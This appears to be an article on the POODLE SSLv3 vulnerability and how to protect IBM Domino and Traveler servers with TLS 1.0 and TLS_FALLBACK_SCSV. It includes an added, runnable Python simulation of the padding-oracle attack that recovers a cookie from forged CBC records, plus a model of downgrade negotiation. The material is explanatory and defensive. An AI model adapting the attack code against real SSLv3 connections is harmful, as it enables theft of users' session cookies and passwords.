In September 2014, a team at Google discovered a critical flaw in SSL 3.0 that lets an attacker on the network path recover secret information, such as session cookies, from an encrypted connection. The vulnerability, publicly disclosed on 14 October 2014 and tracked as CVE-2014-3566, is known as the POODLE attack (Padding Oracle On Downgraded Legacy Encryption).
The POODLE attack can be used against any website that supports SSL version 3.0. Because SSLv3 is no longer secure, browsers and websites need to disable it and use the modern TLS protocol versions in order to avoid compromising users' private information. Browsers that have disabled SSLv3, or that no longer fall back from TLS to SSLv3, can no longer connect to Domino and Traveler servers whose HTTP task supports only SSLv3.
Here we take a look at what can be done at the Domino server level to address this issue.
How it Works
This is a man-in-the-middle attack against Web browsers: the attacker must be able to intercept and modify traffic between the browser and the server, and must be able to make the browser send HTTPS requests of his choosing (typically through JavaScript on a page he controls).
Any website that supports SSLv3 is vulnerable to POODLE, even if it also supports more recent versions of TLS. Such servers are subject to a downgrade attack, in which the attacker tricks the browser into connecting with SSLv3. This relies on a browser behaviour called insecure fallback: when a handshake fails (for example because the attacker resets the connection), the browser retries with a lower version of TLS or SSL until one succeeds. Once the connection is using SSLv3 with a CBC cipher suite, the attacker exploits a weakness in SSLv3 padding: the padding bytes are not covered by the MAC and only the final padding-length byte is checked, so by substituting ciphertext blocks and observing whether the server accepts or rejects the record, the attacker recovers one byte of plaintext for every 256 requests on average.
By exploiting this vulnerability, an attacker can decrypt parts of SSL sessions and read the plaintext of encrypted connections, including passwords and session cookies, and then use them to access the user's private account data on the website.
Browsers connecting over SSLv3 to the HTTP task of Domino or Traveler servers are exposed to the POODLE attack.
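The padding-oracle step described above, as an added simulation that is not part of this page or of IBM's Domino code. It reproduces the SSLv3 record layout (data, MAC, padding, one checked length byte) in CBC mode and shows how an attacker who can only make the browser send requests and observe whether the server accepts a record recovers a cookie byte by byte. The block cipher is a toy Feistel network built from HMAC-SHA256 (an assumption so the example runs without any third-party library; the attack depends only on CBC mode and the SSLv3 padding rule, not on the cipher), and the keys, IVs and the secret cookie are constructed here.

```python
"""Simulation of the POODLE padding oracle against SSL 3.0 CBC records.

Added example, not IBM or Domino code. The block cipher is a toy 4-round
Feistel network built from HMAC-SHA256 (assumed for a self-contained demo; the
attack depends only on CBC mode and SSLv3 padding rules, not on the cipher).
Keys, IVs and the secret cookie are constructed here."""
import hashlib
import hmac
import random

BLOCK = 16    # cipher block size
MAC_LEN = 16  # truncated record MAC length

def _xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))

def _round(key, half, i):
    return hmac.new(key, bytes([i]) + half, hashlib.sha256).digest()[:8]

def block_encrypt(key, block):
    l, r = block[:8], block[8:]
    for i in range(4):
        l, r = r, _xor(l, _round(key, r, i))
    return l + r

def block_decrypt(key, block):
    l, r = block[:8], block[8:]
    for i in reversed(range(4)):
        l, r = _xor(r, _round(key, l, i)), l
    return l + r

def cbc_encrypt(key, iv, pt):
    out, prev = [], iv
    for i in range(0, len(pt), BLOCK):
        prev = block_encrypt(key, _xor(pt[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)

def cbc_decrypt(key, iv, ct):
    out, prev = [], iv
    for i in range(0, len(ct), BLOCK):
        out.append(_xor(block_decrypt(key, ct[i:i + BLOCK]), prev))
        prev = ct[i:i + BLOCK]
    return b"".join(out)

def sslv3_seal(enc_key, mac_key, iv, data):
    """SSLv3 record: data || MAC(data) || padding || pad_len, then CBC. The padding
    bytes are not covered by the MAC and only pad_len is ever checked."""
    mac = hmac.new(mac_key, data, hashlib.sha256).digest()[:MAC_LEN]
    pad_len = BLOCK - 1 - (len(data) + MAC_LEN) % BLOCK
    return iv + cbc_encrypt(enc_key, iv, data + mac + bytes(pad_len) + bytes([pad_len]))

def sslv3_open(enc_key, mac_key, record):
    """Server side: True if the record is accepted. This accept/reject is the oracle."""
    pt = cbc_decrypt(enc_key, record[:BLOCK], record[BLOCK:])
    pad_len = pt[-1]
    if pad_len >= BLOCK:
        return False
    pt = pt[:len(pt) - pad_len - 1]
    expected = hmac.new(mac_key, pt[:-MAC_LEN], hashlib.sha256).digest()[:MAC_LEN]
    return hmac.compare_digest(pt[-MAC_LEN:], expected)

def poodle_recover(secret_len, send_request, oracle, max_tries=20000):
    """send_request(prefix_len, suffix_len) models attacker JavaScript making the
    browser send a request with that much filler around the secret; the attacker
    gets back only ciphertext. oracle(record) models the server's accept/reject."""
    recovered = bytearray()
    for k in range(secret_len):
        prefix_len = (BLOCK - 1 - k) % BLOCK        # secret[k] becomes last byte of a block
        target = (prefix_len + k) // BLOCK          # plaintext block holding it
        suffix_len = (-(prefix_len + secret_len + MAC_LEN)) % BLOCK  # full block of padding
        for _ in range(max_tries):
            rec = send_request(prefix_len, suffix_len)
            blocks = [rec[i:i + BLOCK] for i in range(0, len(rec), BLOCK)]  # blocks[0] = IV
            forged = b"".join(blocks[:-1]) + blocks[target + 1]  # padding block := target block
            if oracle(forged):
                # Accepted iff D(C_t)[15] ^ (block before the last)[15] == 15;
                # undo the CBC xor with C_t's own predecessor to get P_t[15].
                recovered.append((BLOCK - 1) ^ blocks[-2][15] ^ blocks[target][15])
                break
        else:
            raise RuntimeError("oracle never accepted a forged record")
    return bytes(recovered)

def make_victim(secret, seed=1234):
    """Constructed browser/server pair sharing keys the attacker never sees."""
    enc_key, mac_key = b"demo-enc-key", b"demo-mac-key"
    rng = random.Random(seed)  # deterministic IVs so the run is reproducible

    def send_request(prefix_len, suffix_len):
        iv = bytes(rng.getrandbits(8) for _ in range(BLOCK))
        return sslv3_seal(enc_key, mac_key, iv, b"A" * prefix_len + secret + b"B" * suffix_len)

    return send_request, lambda record: sslv3_open(enc_key, mac_key, record)

if __name__ == "__main__":
    send, oracle = make_victim(b"sid=7f3a")
    print(poodle_recover(8, send, oracle))
```

Running the script prints the recovered cookie after roughly 256 forged records per byte. The same trick fails against TLS 1.0 and later because the receiver checks every padding byte, so a substituted block is rejected regardless of its last byte.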
How to Solve the Issue
The recommended response is to support TLS_FALLBACK_SCSV (RFC 7507). With this mechanism, a browser that retries a failed connection at a lower protocol version includes a signalling cipher suite value in its ClientHello; a server that supports a higher version than the one now offered rejects the handshake with an inappropriate_fallback alert instead of completing it. An attacker can therefore no longer induce a browser to fall back to SSLv3 by interfering with its TLS handshakes. The same check blocks forced downgrades from TLS 1.2 to 1.1 or 1.0 and so protects against future downgrade attacks of this kind. Note that the protection only applies when both the browser and the server support TLS_FALLBACK_SCSV; a browser that does not send the value can still be downgraded, which is why disabling SSLv3 on the server remains the complete fix.
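The negotiation described above, as an added model that is not part of this page or of IBM's Domino code. It plays both sides of the handshake: a browser with insecure fallback that retries one version lower after each failure, a server that may or may not honour TLS_FALLBACK_SCSV, and an attacker on the path who resets every handshake above SSLv3. The version and alert numbers are the ones RFC 7507 and TLS define; the ordinary cipher-suite codes are illustrative, and the server configurations are constructed to show why the SCSV alone is not enough when old browsers are still in use.

```python
"""Model of TLS_FALLBACK_SCSV (RFC 7507) version negotiation.

Added example, not IBM or Domino code. It models only what matters for a
downgrade: the client's offered version, whether the ClientHello carries the
signalling suite, and whether an attacker on the path drops TLS handshakes."""

SSL3, TLS10, TLS11, TLS12 = 0x0300, 0x0301, 0x0302, 0x0303
NAME = {SSL3: "SSLv3", TLS10: "TLS1.0", TLS11: "TLS1.1", TLS12: "TLS1.2"}
TLS_FALLBACK_SCSV = 0x5600    # signalling cipher suite value, RFC 7507
INAPPROPRIATE_FALLBACK = 86   # alert description, RFC 7507
PROTOCOL_VERSION = 70         # standard TLS alert: no common version

class Server:
    def __init__(self, versions, supports_scsv):
        self.versions = set(versions)
        self.supports_scsv = supports_scsv

    def handshake(self, client_version, cipher_suites):
        """Process one ClientHello: returns ('ok', version) or ('alert', code)."""
        if (self.supports_scsv and TLS_FALLBACK_SCSV in cipher_suites
                and client_version < max(self.versions)):
            # The client admits it is retrying below its best version, yet we
            # support something higher: the earlier failure was not ours, so
            # refuse rather than complete a downgraded handshake.
            return "alert", INAPPROPRIATE_FALLBACK
        usable = [v for v in self.versions if v <= client_version]
        if not usable:
            return "alert", PROTOCOL_VERSION
        return "ok", max(usable)

def connect(server, client_versions, client_sends_scsv, attacker_blocks_tls):
    """Browser with insecure fallback: on a failed handshake, retry one version
    lower. Returns (negotiated version name or None, transcript)."""
    transcript = []
    for attempt, version in enumerate(sorted(client_versions, reverse=True)):
        suites = [0xC02F, 0x002F]                 # illustrative ordinary suites
        if attempt > 0 and client_sends_scsv:
            suites.append(TLS_FALLBACK_SCSV)      # "this is a fallback retry"
        if attacker_blocks_tls and version > SSL3:
            # The attacker resets the connection; to the browser this looks
            # like a server that cannot speak this version.
            transcript.append((NAME[version], "connection reset"))
            continue
        result, value = server.handshake(version, suites)
        if result == "ok":
            transcript.append((NAME[version], "negotiated " + NAME[value]))
            return NAME[value], transcript
        transcript.append((NAME[version], "alert %d" % value))
        if value == INAPPROPRIATE_FALLBACK:
            return None, transcript               # hard failure, no further fallback
    return None, transcript

BROWSER = [TLS12, TLS11, TLS10, SSL3]

def scenarios():
    """Negotiated version per constructed server configuration."""
    legacy = Server([SSL3, TLS10], supports_scsv=False)   # unpatched server
    patched = Server([SSL3, TLS10], supports_scsv=True)   # SCSV-aware, SSLv3 still on
    hardened = Server([TLS10], supports_scsv=True)        # SSLv3 disabled
    return {
        "unpatched server":            connect(legacy, BROWSER, True, True)[0],
        "SCSV on both sides":          connect(patched, BROWSER, True, True)[0],
        "SCSV server, old browser":    connect(patched, BROWSER, False, True)[0],
        "SSLv3 disabled, old browser": connect(hardened, BROWSER, False, True)[0],
        "no attacker":                 connect(patched, BROWSER, True, False)[0],
    }

if __name__ == "__main__":
    for label, outcome in scenarios().items():
        print("%-28s -> %s" % (label, outcome))
```

With the attacker present, the unpatched server ends up on SSLv3, the SCSV-aware server refuses the fallback handshake outright, and the server with SSLv3 disabled simply cannot be downgraded even by a browser that never sends the SCSV. The third scenario is the one to watch: an SCSV-capable server still negotiates SSLv3 with a browser that does not send the value, so the server-side fix is to disable SSLv3 as well as to install the TLS_FALLBACK_SCSV support.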
IBM has released Domino server Interim Fixes that implement TLS 1.0 with TLS_FALLBACK_SCSV support for HTTP to protect against the POODLE attack.
Implementing TLS 1.0 on Domino protects Domino and Traveler and allows browsers that have disabled SSLv3 or insecure fallback to keep connecting to the server.
Refer to the IBM Domino support for TLS 1.0 wiki page for detailed information and the exact steps to take, according to the version of Domino or Traveler you are currently running.
IBM related articles
- How to disable SSLv3 on a IBM Domino Server?
- IBM Domino Interim Fixes to support TLS 1.0 which can be used to prevent the POODLE attack
- Implementing TLS support with Domino & IHS
- Security Bulletin: POODLE Attack Affects Domino
- TLS Fallback Signaling Cipher Suite Value (TLS_FALLBACK_SCSV) for Preventing Protocol Downgrade Attacks
Microsoft related articles